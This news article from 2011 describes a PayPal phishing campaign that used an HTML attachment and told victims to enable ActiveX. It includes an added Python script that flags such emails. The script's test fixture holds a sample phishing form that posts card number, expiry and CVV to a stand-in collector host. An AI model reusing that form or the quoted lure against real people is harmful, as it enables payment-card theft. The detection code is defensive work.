Feb 24, 2011 06:14 GMT  ·  By

Security researchers from Sophos warn that a new wave of PayPal phishing emails is hitting people's inboxes in an attempt to trick them into exposing their login credentials.

The emails bear a subject of "Please confirm your identity" and have forged headers to appear as originating from PayPal.

However, it appears the attackers forgot to also change the sending email address from [email protected], which suggests they previously ran a phishing campaign against Australian taxpayers.

The fake PayPal emails do not contain a link to a phishing site, as most such attacks do. Instead they carry an HTML document as an attachment which, when opened in a browser, mimics the PayPal website and presents a form for entering credit card data.

The email message does not stand out and uses a traditional lure. It informs recipients that unusual activity was detected on their accounts, which led to them being restricted.

They are asked to verify their identity using credit card details, so that account restrictions can be lifted. In order to make sure the form works, phishers included instructions on how to bypass the browser security mechanisms.

"When you will complete the document we have sent, remember to ALLOW javascript and ActiveX to run from the bar that will pop-up, otherwise we cannot verify the informations you have provided," they write.
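The three traits described above (a From header claiming the brand, a sending address on an unrelated domain, and the phishing page shipped as an HTML attachment with a card form rather than a link) can be checked mechanically at the mail gateway. The script below is an added illustration, not code from Sophos or from the article; the sample message, its addresses and the `verify.html` filename are constructed placeholders.

```python
"""Triage heuristics for attachment-based brand phishing (added example)."""
import email
import email.utils
import re
from email import policy

# Constructed sample: brand in the From display name, a different domain in the
# envelope sender, and the fake login page attached as HTML instead of linked.
SAMPLE_EMAIL = b"""Return-Path: <refund@tax-office.example>
From: PayPal <service@paypal.example>
Subject: Please confirm your identity
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Unusual activity was detected on your account. Open the attached document to verify.
--b1
Content-Type: text/html; name="verify.html"
Content-Disposition: attachment; filename="verify.html"

<html><form action="http://collector.example/post" method="post">
Card number <input name="cardnumber"> Expiry <input name="expdate"> CVV <input name="cvv2">
</form></html>
--b1--
"""

CARD_FIELD = re.compile(r'name=["\']?(card|cc|cvv|cvc|exp)', re.I)

def _domain(header_value: str) -> str:
    """Lower-cased domain of the first address found in a header value."""
    _, addr = email.utils.parseaddr(header_value)
    return addr.rpartition("@")[2].lower()

def analyze_message(raw: bytes, brand: str = "paypal") -> list[str]:
    """Return the list of phishing indicators present in a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = []
    display_name, _ = email.utils.parseaddr(str(msg.get("From", "")))
    from_dom = _domain(str(msg.get("From", "")))
    path_dom = _domain(str(msg.get("Return-Path", "")))
    # 1. Display name claims the brand, but the envelope sender is on another domain.
    if brand in display_name.lower() and path_dom and path_dom != from_dom:
        found.append(f"sender-mismatch:{from_dom}!={path_dom}")
    # 2. An HTML attachment contains a form: the phishing page travels inside the mail.
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        body = part.get_content()
        if "<form" in body.lower():
            found.append(f"html-form-attachment:{part.get_filename()}")
            if CARD_FIELD.search(body):  # 3. The form asks for payment card details.
                found.append("card-fields-in-form")
    return found
```

Run `analyze_message(SAMPLE_EMAIL)` to see all three indicators fire; a legitimate notification with matching domains and no HTML attachment yields an empty list.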

"If you're ever uncertain whether a message really comes from PayPal or not, visit the real PayPal website and log in as usual. If they really have a security message for you, you'll be able to read it via the PayPal messaging system itself," advises Graham Cluley, senior technology consultant at Sophos.

In addition, the PayPal website is protected with SSL. Users are always advised to check for visual cues that indicate the connection is secure before logging into their accounts or providing any kind of information.